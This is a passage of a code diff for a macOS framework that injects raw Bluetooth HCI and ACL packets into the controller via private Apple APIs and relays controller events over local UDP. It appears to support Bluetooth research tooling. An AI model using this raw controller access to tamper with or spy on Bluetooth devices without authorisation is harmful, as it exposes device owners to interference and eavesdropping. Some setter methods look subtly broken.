// Copyright © 2019 Davide Toldo. All rights reserved.
//
import Foundation
extension Data {
struct HexEncodingOptions: OptionSet {
let rawValue: Int
static let upperCase = HexEncodingOptions(rawValue: 1 << 0)
}
func hexEncodedString(options: HexEncodingOptions = []) -> String {
let format = options.contains(.upperCase) ? "%02hhX" : "%02hhx"
return map { String(format: format, $0) }.joined()
}
}
extension String {
init?(_ num: UInt8?) {
if let n = num { self = String(n) }
else { return nil }
}
func separate(every stride: Int = 4, with separator: Character = " ") -> String {
return String(enumerated().map { $0 > 0 && $0 % stride == 0 ? [separator, $1] : [$1]}.joined())
}
func toAscii() -> String {
let pattern = "(0x)?([0-9a-f]{2})"
let regex = try! NSRegularExpression(pattern: pattern, options: .caseInsensitive)
let nsString = self as NSString
let matches = regex.matches(in: self, options: [], range: NSMakeRange(0, nsString.length))
var characters = matches.map {
Character(UnicodeScalar(UInt32(nsString.substring(with: $0.range(at: 2)), radix: 16)!)!)
}
characters = characters.map {
if !$0.isASCII { return "." }
if $0.asciiValue! < 32 { return "." }
if $0.asciiValue! > 130 { return "." }
if $0.isNewline { return "." }
if $0 == "\0" { return "." }
return $0
}
return String(characters)
}
var hexadecimal: Data? {
var data = Data(capacity: count / 2)
let regex = try! NSRegularExpression(pattern: "[0-9a-f]{1,2}", options: .caseInsensitive)
regex.enumerateMatches(in: self, range: NSRange(startIndex..., in: self)) { match, _, _ in
let byteString = (self as NSString).substring(with: match!.range)
let num = UInt8(byteString, radix: 16)!
data.append(num)
}
guard data.count > 0 else { return nil }
return data
}
subscript (i: Int) -> String {
return self[i ..< i + 1]
}
func substring(fromIndex: Int) -> String {
return self[min(fromIndex, count) ..< count]
}
func substring(toIndex: Int) -> String {
return self[0 ..< max(0, toIndex)]
}
subscript (r: Range<Int>) -> String {
let range = Range(uncheckedBounds: (lower: max(0, min(count, r.lowerBound)), upper: min(count, max(0, r.upperBound))))
let start = index(startIndex, offsetBy: range.lowerBound)
let end = index(start, offsetBy: range.upperBound - range.lowerBound)
return String(self[start ..< end])
}
}
extension Sequence where Element == UInt8 {
var data: Data { .init(self) }
var hexa: String { map { .init(format: "%02x", $0) }.joined() }
}
macos-framework/IOBluetoothExtended/IOBluetoothExtended/HCICommunicator.h
+21
View File
@@ -0,0 +1,21 @@
//
// HCICommunicator.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#ifndef HCICommunicator_h
#define HCICommunicator_h
@interface HCICommunicator: NSObject
+ (void) sendHCICommand:(uint8_t [])arg1 len:(uint8_t)arg2;
+ (void) sendACLCommand:(uint8_t [])arg1 len:(uint8_t)arg2;
@end
#endif /* HCICommunicator_h */
macos-framework/IOBluetoothExtended/IOBluetoothExtended/HCICommunicator.m
+70
View File
@@ -0,0 +1,70 @@
//
// HCICommunicator.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "HCICommunicator.h"
#import "IOBluetoothExtended.h"
#import <IOBluetoothHostController.h>
@implementation HCICommunicator
+ (void) sendHCICommand:(uint8_t [])arg1 len:(uint8_t)arg2 {
NSData *data = [NSData dataWithBytes:arg1 length:arg2];
uint8_t *command = calloc(arg2, sizeof(uint8_t));
memcpy(command, [data bytes], arg2);
BluetoothHCIRequestID request = 0;
int error = BluetoothHCIRequestCreate(&request, 1000, nil, 0);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Couldn't create error: %08x\n", error);
}
size_t commandSize = 3;
if (arg2 > 2) {
commandSize += command[2];
}
error = BluetoothHCISendRawCommand(request, command, commandSize);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Send HCI command Error: %08x\n", error);
}
sleep(0x1);
BluetoothHCIRequestDelete(request);
}
+ (void) sendACLCommand:(uint8_t [])arg1 len:(uint8_t)arg2 {
NSData *data = [NSData dataWithBytes:arg1 length:arg2];
uint8_t *commandData = calloc(arg2, sizeof(uint8_t));
memcpy(commandData, [data bytes], arg2);
BluetoothHCIRequestID request = 0;
int error = BluetoothHCIRequestCreate(&request, 1000, nil, 0);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Couldn't create error: %08x\n", error);
}
// Read device handle from data
uint16_t handle = commandData[0];
error = BluetoothHCISendRawACLData(commandData, arg2, handle, request);
if (error) {
BluetoothHCIRequestDelete(request);
printf("Send HCI command Error: %08x\n", error);
}
sleep(0x1);
BluetoothHCIRequestDelete(request);
}
@end
macos-framework/IOBluetoothExtended/IOBluetoothExtended/HCIDelegate.h
+37
View File
@@ -0,0 +1,37 @@
//
// HCIDelegate.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/IOBluetooth.h>
#ifndef HCIDelegate_h
#define HCIDelegate_h
@interface HCIDelegate: NSObject
@property (nonatomic, assign) NSString *hostname;
@property (nonatomic, assign) NSString *inject;
@property (nonatomic, assign) NSString *snoop;
@property (nonatomic, assign) int32_t sock_fd;
@property (nonatomic, assign) int32_t client_fd;
@property (nonatomic, assign) Boolean exit_requested;
- (id) initWith:(NSString *)inject and:(NSString*)snoop;
+ (void) setHostname:(NSString *)arg1;
+ (void) setInject:(NSString *)arg1;
+ (void) setSnoop:(NSString *)arg1;
- (void) shutdown;
@end
#endif /* HCIDelegate_h */
macos-framework/IOBluetoothExtended/IOBluetoothExtended/HCIDelegate.m
+42
View File
@@ -0,0 +1,42 @@
//
// Commands.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "HCIDelegate.h"
#import "IOBluetoothExtended/IOBluetoothExtended-Swift.h"
@implementation HCIDelegate
Boolean exit_requested = false;
- (id) initWith:(NSString *)inject and:(NSString*)snoop {
if (self = [super init]) {
self.inject = inject;
self.snoop = snoop;
self.hostname = @"127.0.0.1";
[self initServer];
}
return self;
}
+ (void) setHostname:(NSString *)hostname {
self.hostname = hostname;
}
+ (void) setInject:(NSString *)port {
self.inject = port;
}
+ (void) setSnoop:(NSString *)port {
self.snoop = port;
}
- (void) shutdown {
exit_requested = true;
}
@end
macos-framework/IOBluetoothExtended/IOBluetoothExtended/HCIDelegate.swift
+196
View File
@@ -0,0 +1,196 @@
//
// HCIDelegate.swift
// IOBluetoothExtended
//
// Created by Davide Toldo on 03.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
import Foundation
import Network
extension HCIDelegate: IOBluetoothHostControllerDelegate {
@objc public func initServer() {
//print("IOBE: Initializing, snoop: \(snoop ?? "-1"), inject: \(inject ?? "-1")")
self.startupServer()
}
public func sendOverUDP(data: Data, _ hostUDP: NWEndpoint.Host, _ portUDP: NWEndpoint.Port) {
var server_addr = sockaddr_in()
let server_addr_size = socklen_t(MemoryLayout.size(ofValue: server_addr))
server_addr.sin_len = UInt8(server_addr_size)
server_addr.sin_family = sa_family_t(AF_INET) // chooses IPv4
server_addr.sin_port = UInt16(portUDP.rawValue).bigEndian // chooses the port
let sock_fd = socket(AF_INET, SOCK_DGRAM, 0)
if sock_fd == -1 {
perror("Failure: creating socket")
exit(EXIT_FAILURE)
}
var bytes = [UInt8](repeating: 0, count: data.count)
(data as NSData).getBytes(&bytes, length: bytes.count)
let addr = UnsafeRawPointer(&server_addr).assumingMemoryBound(to: sockaddr.self)
sendto(sock_fd, &bytes, data.count, 0, addr, server_addr_size)
}
private func startupServer() {
let i = NWEndpoint.Port(self.inject as String)
// Create socket
let sock_fd = socket(AF_INET, SOCK_DGRAM, 0)
if sock_fd == -1 {
perror("Failure: creating socket")
exit(EXIT_FAILURE)
}
var sock_opt_on = Int32(1)
setsockopt(sock_fd, SOL_SOCKET, SO_REUSEADDR, &sock_opt_on, socklen_t(MemoryLayout.size(ofValue: sock_opt_on)))
var server_addr = sockaddr_in()
let server_addr_size = socklen_t(MemoryLayout.size(ofValue: server_addr))
server_addr.sin_len = UInt8(server_addr_size)
server_addr.sin_family = sa_family_t(AF_INET) // chooses IPv4
server_addr.sin_port = UInt16(i!.rawValue).bigEndian // chooses the port
// Bind socket
let bind_server = withUnsafePointer(to: &server_addr) {
Darwin.bind(sock_fd, UnsafeRawPointer($0).assumingMemoryBound(to: sockaddr.self), server_addr_size)
}
if bind_server == -1 {
perror("Failure: binding port")
exit(EXIT_FAILURE)
}
//print("IOBE: Listening on", server_addr.sin_port.bigEndian)
DispatchQueue.global(qos: .background).async {
while !self.exit_requested {
// Prepare for receiving data
var client_addr = sockaddr_storage()
var client_addr_len = socklen_t(MemoryLayout.size(ofValue: client_addr))
var receiveBuffer = [UInt8](repeating: 0, count: 1024)
var bytesRead = 0
// Receive data via syscall
bytesRead = withUnsafeMutablePointer(to: &client_addr) {
$0.withMemoryRebound(to: sockaddr.self, capacity: 1) {
recvfrom(sock_fd, &receiveBuffer, 1024, 0, $0, &client_addr_len)
}
}
if bytesRead == -1 {
perror("Failure: error while reading")
exit(EXIT_FAILURE)
}
// After reading the command, do all further processing on another
// Thread to be able to accept new incoming commands from the socket
DispatchQueue.global(qos: .background).async {
var command = Array([UInt8](receiveBuffer).dropFirst(2))
let length: UInt8 = receiveBuffer[1]
// Send command to Bluetooth HCI Controller
let hci_type = [UInt8](receiveBuffer)[0]
if hci_type == 0x01 {
HCICommunicator.sendHCICommand(&command, len: length)
}
else {
HCICommunicator.sendACLCommand(&command, len: length)
}
}
}
print("Exiting...")
close(self.sock_fd)
close(self.client_fd)
}
}
@objc(BluetoothHCIEventNotificationMessage:inNotificationMessage:)
public func bluetoothHCIEventNotificationMessage(_ controller: IOBluetoothHostController,
in message: UnsafeMutablePointer<IOBluetoothHCIEventNotificationMessage>) {
let opcode = message.pointee.dataInfo.opcode
let data = IOBluetoothHCIEventParameterData(message)
if opcode == 0 { return }
let dataInfo = message.pointee.dataInfo
let opcod1 = String(format:"%02X", dataInfo.opcode)
let opcod2 = Array(repeating: "0", count: 4-opcod1.count) + Array(opcod1)
if opcod2.count < 4 { return }
let opcod3 = "\(opcod2[2])\(opcod2[3])\(opcod2[0])\(opcod2[1])"
var result = "04"
result.append(String(format:"%02X", dataInfo._field7))
result.append("\(String(format:"%02X", dataInfo.parameterSize+3))")
result.append("01\(opcod3)")
result.append(data.hexEncodedString())
// printFormatted(result)
if result.count < 8 { return }
let h = NWEndpoint.Host(self.hostname as String)
let s = NWEndpoint.Port(self.snoop as String)
// Version Information
if opcode == 0x1001 {
var temp = ""
for i in [0,1,2,3,4,5,9,8,14,15,12,6,7,10,11] {
temp.append(result[i*2])
temp.append(result[i*2+1])
}
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
// Connection Complete
else if opcode == 0x0405 || opcode == 0x0409 {
let orig = data.hexEncodedString()
var temp = "0403"
for i in [8,9,0,1,7,6,5,4,3,2] {
temp.append(orig[i*2])
temp.append(orig[i*2+1])
}
if temp.count != 24 { return }
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
// Disconnection Complete
else if opcode == 0x0406 {
let orig = data.hexEncodedString()
if orig.count == 0 { return }
var temp = "040504"
for i in [2,1,0] {
temp.append(orig[i*2])
temp.append(orig[i*2+1])
}
self.sendOverUDP(data: temp.hexadecimal!, h, s!)
}
else {
let temp = result.hexadecimal!
if temp.count >= 8 {
self.sendOverUDP(data: temp, h, s!)
}
}
}
func printFormatted(_ result: String) {
let str = result.separate()
var formatted = ""
for (i, sub) in str.components(separatedBy: " ").enumerated() {
if i % 8 == 7 {
let rowIndex = i/8
let start = result.index(result.startIndex, offsetBy: rowIndex * 32)
let end = rowIndex * 32 + 32 < result.count ?
result.index(result.startIndex, offsetBy: rowIndex * 32 + 32) :
result.endIndex
let range = start..<end
let row = String(result[range])
formatted.append(sub + " \(row.toAscii())\n")
}
else {
formatted.append(sub + " ")
}
}
print(formatted)
}
}
macos-framework/IOBluetoothExtended/IOBluetoothExtended/IOBE.h
+26
View File
@@ -0,0 +1,26 @@
//
// IOBE.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <IOBluetooth/IOBluetooth.h>
#ifndef IOBE_h
#define IOBE_h
@class HCIDelegate;
@interface IOBE: NSObject {
IOBluetoothHostController *controller;
HCIDelegate *delegate;
}
- (void) shutdown;
@end
#endif /* IOBE_h */
macos-framework/IOBluetoothExtended/IOBluetoothExtended/IOBE.m
+31
View File
@@ -0,0 +1,31 @@
//
// IOBE.m
// IOBluetoothExtended
//
// Created by Davide Toldo on 19.09.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import "IOBE.h"
#import "HCIDelegate.h"
@implementation IOBE
- (id) initWith:(NSString *)inject and:(NSString*)snoop {
if (self = [super init]) {
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_BACKGROUND, 0), ^{
self->controller = IOBluetoothHostController.defaultController;
self->delegate = [[HCIDelegate alloc] initWith:inject and:snoop];
self->controller.delegate = self->delegate;
[[NSRunLoop currentRunLoop] run];
});
}
return self;
}
- (void) shutdown {
[self->delegate shutdown];
}
@end
macos-framework/IOBluetoothExtended/IOBluetoothExtended/IOBluetoothExtended.h
+20
View File
@@ -0,0 +1,20 @@
//
// IOBluetoothExtended.h
// IOBluetoothExtended
//
// Created by Davide Toldo on 06.07.19.
// Copyright © 2019 Davide Toldo. All rights reserved.
//
#import <Cocoa/Cocoa.h>
#import <HCIDelegate.h>
#import <HCICommunicator.h>
#import <IOBluetoothHostController.h>
//! Project version number for IOBluetoothExtended.
FOUNDATION_EXPORT double IOBluetoothExtendedVersionNumber;
//! Project version string for IOBluetoothExtended.
FOUNDATION_EXPORT const unsigned char IOBluetoothExtendedVersionString[];
// In this header, you should import all the public headers of your framework using statements like #import <IOBluetoothExtended/PublicHeader.h>
macos-framework/IOBluetoothExtended/IOBluetoothExtended/IOBluetoothHostController.h
+349
View File
@@ -0,0 +1,349 @@
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
@import Foundation;
@import IOBluetooth;
struct IOBluetoothHCIEventNotificationMessage;
typedef struct IOBluetoothHCIEventNotificationMessage * IOBluetoothHCIEventNotificationMessageRef;
NS_ASSUME_NONNULL_BEGIN
@protocol IOBluetoothHostControllerDelegate
@optional
- (void)BluetoothHCIEventNotificationMessage:(IOBluetoothHostController*)controller
inNotificationMessage:(IOBluetoothHCIEventNotificationMessageRef)message;
@end
@interface IOBluetoothHostController (PrivateAPI)
+ (void)initialize;
+ (id)getPropertyObjectFromIOServiceNamed:(const char *)arg1 forKey:(id)arg2;
+ (id)defaultController;
+ (id)controllers;
+ (void)enableNotifications;
@property id delegate; // @synthesize delegate=_delegate;
- (void)BluetoothHostControllerSetupCompleted;
- (void)sendInquiryResultToDelegate:(struct IOBluetoothHCIEventNotificationMessage *)arg1;
- (void)processRawEventData:(const void *)arg1 dataSize:(unsigned long long)arg2;
- (void)asyncHCIEventNotificationWithRef:(struct OpaqueIOBluetoothNotificationRef *)arg1 subClass:(unsigned int)arg2 data:(const void *)arg3 dataSize:(unsigned long long)arg4;
- (void)stopHCIEventListener;
- (id)getDeviceForHCIRequestID:(unsigned int)arg1 removeIfFound:(BOOL)arg2;
- (void)addDeviceToOutstandingRequests:(id)arg1 forHCIRequestID:(unsigned int)arg2;
- (int)BluetoothHCILETrackSensor:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 timeoutValue:(unsigned char)arg3 outLEextOpcode:(char *)arg4;
- (int)BluetoothHCILEExtendedDuplicateFilter:(char *)arg1 outAction:(unsigned char)arg2;
- (int)BluetoothHCILEAdvPacketPacketFilterServiceUUIDClear:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4;
- (int)BluetoothHCILEAdvPacketPacketFilterServiceUUIDWrite:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 logicalType:(unsigned char)arg3 outLEextOpcode:(char *)arg4 outAction:(char *)arg5 UUID:(char *)arg6;
- (int)BluetoothHCIBroadcomTagLEA:(unsigned long long)arg1 connectionHandle:(unsigned short)arg2 input:(BOOL)arg3 channel:(BOOL)arg4;
- (int)BluetoothHCILEScanRSSIThresholdWrite:(unsigned char)arg1 rssiThresdhold:(BOOL)arg2 outAction:(char *)arg3;
- (int)BluetoothHCILEScanRSSIThresholdRead:(char *)arg1 outMode:(char *)arg2 outRSSIThreshold:(char *)arg3;
- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionClear:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4;
- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionRead:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 outLEextOpcode:(char *)arg3 outAction:(char *)arg4 outFeatureSelection:(unsigned int *)arg5 outLogicalType:(char *)arg6;
- (int)BluetoothHCILEAdvPacketContentFilterFeatureSectionWrite:(struct BluetoothDeviceAddress *)arg1 addressType:(unsigned char)arg2 featureSelection:(unsigned int)arg3 logicalType:(unsigned char)arg4 outLEextOpcode:(char *)arg5 outAction:(char *)arg6;
- (int)BluetoothHCILEBroadcomReadIRKList:(unsigned char)arg1 outLEextOpcode:(char *)arg2 outIRKListIndex:(char *)arg3 outIRK:(char *)arg4 outAddressType:(char *)arg5 outAddress:(struct BluetoothDeviceAddress *)arg6 outResolvedPrivateAddress:(struct BluetoothDeviceAddress *)arg7;
- (int)BluetoothHCILEBroadcomClearIRKList:(char *)arg1 outIRKListAvailableSpace:(char *)arg2;
- (int)BluetoothHCILEBroadcomRemoveIRKFromList:(unsigned char)arg1 address:(struct BluetoothDeviceAddress *)arg2 outLEextOpcode:(char *)arg3 outIRKListAvailableSpace:(char *)arg4;
- (int)BluetoothHCILEBroadcomAddIRKToList:(char *)arg1 addressType:(unsigned char)arg2 address:(struct BluetoothDeviceAddress *)arg3 outLEextOpcode:(char *)arg4 outIRKListAvailableSpace:(char *)arg5;
- (int)BluetoothHCILEBroadcomEnableCustomerSpecificFeatures:(unsigned int)arg1 outLEextOpcode:(char *)arg2;
- (int)readVerboseConfigVersionInfo:(char *)arg1 outTargetID:(char *)arg2 outBaseline:(unsigned short *)arg3 outBuild:(unsigned short *)arg4;
- (int)superPeekPoke:(unsigned char)arg1 address:(unsigned int)arg2 outValue:(unsigned int *)arg3;
- (int)removeHIDEmulationDevice:(struct BluetoothDeviceAddress)arg1;
- (int)readHIDEmulationDevices;
- (int)addHIDEmulationDevice:(struct BluetoothDeviceAddress)arg1 classOfDevice:(unsigned int)arg2 linkKey:(struct BluetoothKey)arg3;
- (int)triStateEnabled:(BOOL)arg1;
- (int)startTransmitTest:(struct BluetoothDeviceAddress *)arg1 hoppingMode:(unsigned char)arg2 frequency:(unsigned char)arg3 modulationType:(unsigned char)arg4 logicalChannel:(unsigned char)arg5 packetType:(unsigned char)arg6 packetLength:(unsigned short)arg7 transmitPower:(unsigned char)arg8 transmitPowerdBm:(unsigned char)arg9 transmitPowerTableIndex:(unsigned char)arg10;
- (int)startReceiveTest:(struct BluetoothDeviceAddress *)arg1 reportPeriod:(unsigned short)arg2 frequency:(unsigned char)arg3 modulationType:(unsigned char)arg4 logicalChannel:(unsigned char)arg5 packetType:(unsigned char)arg6 packetLength:(unsigned short)arg7;
- (int)setTransmitPowerForDevice:(id)arg1 toLevel:(unsigned char)arg2;
- (int)readRawRSSIForDevice:(id)arg1;
- (int)BluetoothHCIBroadcomSetProximityTrigger:(unsigned char)arg1 inEnableAwayTrigger:(unsigned char)arg2;
- (int)BluetoothHCIBroadcomSetProximityTable:(const struct BluetoothDeviceAddress *)arg1 inPowerSteps:(unsigned char)arg2 inAwayTriggerValues:(struct BluetoothBroadcomRSSITriggerValue *)arg3 inPresentTriggerValues:(struct BluetoothBroadcomRSSITriggerValue *)arg4;
- (int)BluetoothHCIBroadcomReadRetransmissionStatus:(unsigned char)arg1 inConnectionHandle:(unsigned short)arg2 inNotificationEnable:(unsigned char)arg3 inNotificationThreshold:(unsigned char)arg4 outConnectionHandle:(unsigned short *)arg5 outRetransmissionCounter:(unsigned int *)arg6 outRetransmissionPercentage:(char *)arg7;
- (int)BluetoothHCIBroadcomIncreaseDecreasePowerLevel:(const struct BluetoothDeviceAddress *)arg1 increase:(unsigned char)arg2;
- (int)BluetoothHCIBroadcomTurnOFFDynamicPowerControl:(unsigned char)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCIBroadcomChangeLNAGainCoexsECI:(unsigned char)arg1;
- (int)BluetoothHCIBroadcomSetUSBAutoResume:(unsigned short)arg1;
- (int)BluetoothHCIBroadcomIgnoreUSBReset:(char *)arg1;
- (int)BluetoothHCIBroadcomGetEDRACLConnectionStats;
- (int)BluetoothHCIBroadcomResetBasicRateACLConnectionStats;
- (int)BluetoothHCIBroadcomGetBasicRateACLConnectionStats;
- (int)BluetoothHCIBroadcomBFCIsConnectionTBFCSuspended:(unsigned short)arg1 outBFCConnectionInfo:(struct BluetoothBroadcomBFCConnectionTBFCSuspendedInfo *)arg2;
- (int)BluetoothHCIBroadcomReadLocalFirmwareInfo:(unsigned char)arg1 outLocalFirmwareInfo:(struct BluetoothBroadcomLocalFirmwareInfo *)arg2;
- (int)BluetoothHCIBroadcomSetEventMask:(const struct BluetoothBroadcomSetEventMask *)arg1;
- (int)BluetoothHCIBroadcomBFCCreateConnection:(const struct BluetoothDeviceAddress *)arg1 inPacketType:(unsigned short)arg2 outConnectionCompleteResults:(struct BluetoothHCIEventConnectionCompleteResults *)arg3;
- (int)BluetoothHCIBroadcomBFCReadScanEnable:(char *)arg1;
- (int)BluetoothHCIBroadcomBFCWriteScanEnable:(unsigned char)arg1;
- (int)BluetoothHCIBroadcomBFCReadRemoteBPCSFeatures:(unsigned short)arg1 outBPCSFeatures:(struct BluetoothBroadcomBFCRemoteBPCSFeatures *)arg2;
- (int)BluetoothHCIBroadcomSetTransmitPower:(unsigned short)arg1 inPower:(BOOL)arg2;
- (int)BluetoothHCIBroadcomBFCSetParams:(struct BluetoothBroadcomBFCParams *)arg1;
- (int)BluetoothHCIBroadcomBFCReadParams:(struct BluetoothBroadcomBFCParams *)arg1;
- (int)BluetoothHCIBroadcomBFCResume:(unsigned short)arg1 inDeviceAddress:(const struct BluetoothDeviceAddress *)arg2 inBFCResume:(struct BluetoothBroadcomBFCReconnectData *)arg3;
- (int)BluetoothHCIBroadcomBFCSuspend:(unsigned short)arg1;
- (int)BluetoothHCIBroadcomReadRawRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCIAtherosReadRawRSSI:(const struct BluetoothDeviceAddress *)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCICSRReadRawRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (BOOL)isLEASupported;
- (BOOL)pairedDeviceSupportTBFCPage;
- (BOOL)tbfcPageSupported;
- (BOOL)tbfcSupported;
- (BOOL)concurrentCreateConnectionSupported;
- (struct BluetoothHCISupportedFeatures)supportedFeatures;
- (id)cachedDeviceAddressString;
- (id)cachedDeviceAddress;
- (unsigned char)cachedHCIVersion;
- (BOOL)lowEnergySupported;
- (int)setPowerState:(int)arg1;
@property(readonly) int powerState;
- (BOOL)powerChangeSupported;
- (int)BluetoothHCILETestEnd:(unsigned short *)arg1;
- (int)BluetoothHCILETransmitterTest:(unsigned char)arg1 lengthOfTestData:(unsigned char)arg2 packetPayload:(unsigned char)arg3;
- (int)BluetoothHCILEReceiverTest:(unsigned char)arg1;
- (int)BluetoothHCILEReadSupportedStates:(unsigned long long *)arg1;
- (int)BluetoothHCILELongTermKeyRequestNegativeReply:(unsigned short)arg1;
- (int)BluetoothHCILELongTermKeyRequestReply:(unsigned short)arg1 longTermKey:(char *)arg2;
- (int)BluetoothHCILEStartEncryption:(unsigned short)arg1 randomNumber:(unsigned long long)arg2 encryptedDiversifier:(unsigned short)arg3 longTermKey:(char *)arg4;
- (int)BluetoothHCILERand:(unsigned long long *)arg1;
- (int)BluetoothHCILEEncrypt:(char *)arg1 plaintextData:(char *)arg2 encryptedData:(char *)arg3;
- (int)BluetoothHCILEReadRemoteUsedFeatures:(unsigned short)arg1;
- (int)BluetoothHCILEReadChannelMap:(unsigned short)arg1 channelMap:(unsigned long long *)arg2;
- (int)BluetoothHCILESetHostChannelClassification:(unsigned long long)arg1;
- (int)BluetoothHCILEConnectionUpdate:(unsigned short)arg1 connectionIntervalMin:(unsigned short)arg2 connectionIntervalMax:(unsigned short)arg3 connectionLatency:(unsigned short)arg4 supervisionTimeout:(unsigned short)arg5 minimumCELength:(unsigned short)arg6 maximumCELength:(unsigned short)arg7;
- (int)BluetoothHCILERemoveDeviceFromWhiteList:(unsigned char)arg1 address:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCILEAddDeviceToWhiteList:(unsigned char)arg1 address:(const struct BluetoothDeviceAddress *)arg2;
- (int)BluetoothHCILEClearWhiteList;
- (int)BluetoothHCILEReadWhiteListSize:(char *)arg1;
- (int)BluetoothHCILECreateConnectionCancel;
- (int)BluetoothHCILECreateConnection:(unsigned short)arg1 LEScanWindow:(unsigned short)arg2 initiatorFilterPolicy:(unsigned char)arg3 peerAddressType:(unsigned char)arg4 peerAddress:(struct BluetoothDeviceAddress *)arg5 ownAddressType:(unsigned char)arg6 connectionIntervalMin:(unsigned short)arg7 connectionIntervalMax:(unsigned short)arg8 connectionLatency:(unsigned short)arg9 supervisionTimeout:(unsigned short)arg10 minimumCELength:(unsigned short)arg11 maximumCELength:(unsigned short)arg12;
- (int)BluetoothHCILESetScanEnable:(unsigned char)arg1 filterDuplicates:(unsigned char)arg2;
- (int)BluetoothHCILESetScanParameters:(unsigned char)arg1 LEScanInterval:(unsigned short)arg2 LEScanWindow:(unsigned short)arg3 ownAddressType:(unsigned char)arg4 scanningFilterPolicy:(unsigned char)arg5;
- (int)BluetoothHCILESetAdvertiseEnable:(unsigned char)arg1;
- (int)BluetoothHCILESetScanResponseData:(unsigned char)arg1 scanResponseData:(char *)arg2;
- (int)BluetoothHCILESetAdvertisingData:(unsigned char)arg1 advertsingData:(char *)arg2;
- (int)BluetoothHCILEReadAdvertisingChannelTxPower:(char *)arg1;
- (int)BluetoothHCILESetAdvertisingParameters:(unsigned short)arg1 advertisingIntervalMax:(unsigned short)arg2 advertisingType:(unsigned char)arg3 ownAddressType:(unsigned char)arg4 directAddressType:(unsigned char)arg5 directAddress:(struct BluetoothDeviceAddress *)arg6 advertisingChannelMap:(unsigned char)arg7 advertisingFilterPolicy:(unsigned char)arg8;
- (int)BluetoothHCILESetRandomAddress:(struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCILEReadLocalSupportedFeatures:(unsigned long long *)arg1;
- (int)BluetoothHCILEReadBufferSize:(unsigned short *)arg1 totalNumberLEDataPackets:(char *)arg2;
- (int)BluetoothHCILESetEventMask:(unsigned long long)arg1;
- (void)BluetoothHCIEventNotification:(const struct IOBluetoothHCIEventNotificationMessage *)arg1;
- (int)BluetoothHCIWriteSimplePairingDebugMode:(unsigned char)arg1;
- (int)BluetoothHCIEnableDeviceUnderTestMode;
- (int)BluetoothHCIWriteLoopbackMode:(unsigned char)arg1;
- (int)BluetoothHCIReadLoopbackMode:(char *)arg1;
- (int)BluetoothHCIReadClock:(unsigned short)arg1 inWhichClock:(unsigned char)arg2 outReadClockInfo:(struct BluetoothReadClockInfo *)arg3;
- (int)BluetoothHCIReadAFHChannelMap:(unsigned short)arg1 outAFHMode:(char *)arg2 outAFHChannelMap:(unsigned char [10])arg3;
- (int)BluetoothHCIReadRSSI:(unsigned short)arg1 outRSSI:(char *)arg2;
- (int)BluetoothHCIReadLinkQuality:(unsigned short)arg1 outLinkQuality:(char *)arg2;
- (int)BluetoothHCIResetFailedContactCounter:(unsigned short)arg1;
- (int)BluetoothHCIReadFailedContactCounter:(unsigned short)arg1 outFailedContactCounter:(unsigned short *)arg2;
- (int)BluetoothHCIReadDeviceAddress:(struct BluetoothDeviceAddress *)arg1;
- (int)BluetoothHCIReadBufferSize:(unsigned short *)arg1 outHCSynchronousDataPacketLength:(char *)arg2 outHCTotalNumACLDataPackets:(unsigned short *)arg3 outHCTotalNumSynchronousDataPackets:(unsigned short *)arg4;
- (int)BluetoothHCIReadLocalExtendedFeatures:(unsigned char)arg1 outMaximumPageNumber:(char *)arg2 outExtendedLMPFeatures:(struct BluetoothHCISupportedFeatures *)arg3;
- (int)BluetoothHCIReadLocalSupportedFeatures:(struct BluetoothHCISupportedFeatures *)arg1;
- (int)BluetoothHCIReadLocalSupportedCommands:(struct BluetoothHCISupportedCommands *)arg1;
- (int)BluetoothHCIReadLocalVersionInformation:(char *)arg1 outHCIRevision:(unsigned short *)arg2 outLMPVersion:(char *)arg3 outManufacturerName:(unsigned short *)arg4 outLMPSubversion:(unsigned short *)arg5;
- (int)BluetoothHCIWriteLEHostSupported:(unsigned char)arg1 simultaneousLEHost:(unsigned char)arg2;
- (int)BluetoothHCIReadLEHostSupported:(char *)arg1 simultaneousLEHost:(char *)arg2;
- (int)BluetoothHCIEnhancedFlush:(unsigned short)arg1 inPacketType:(unsigned char)arg2 outConnectionHandle:(unsigned short *)arg3;
- (int)BluetoothHCIWriteDefaultErroneousDataReporting:(unsigned char)arg1;
- (int)BluetoothHCIReadDefaultErroneousDataReporting:(char *)arg1;
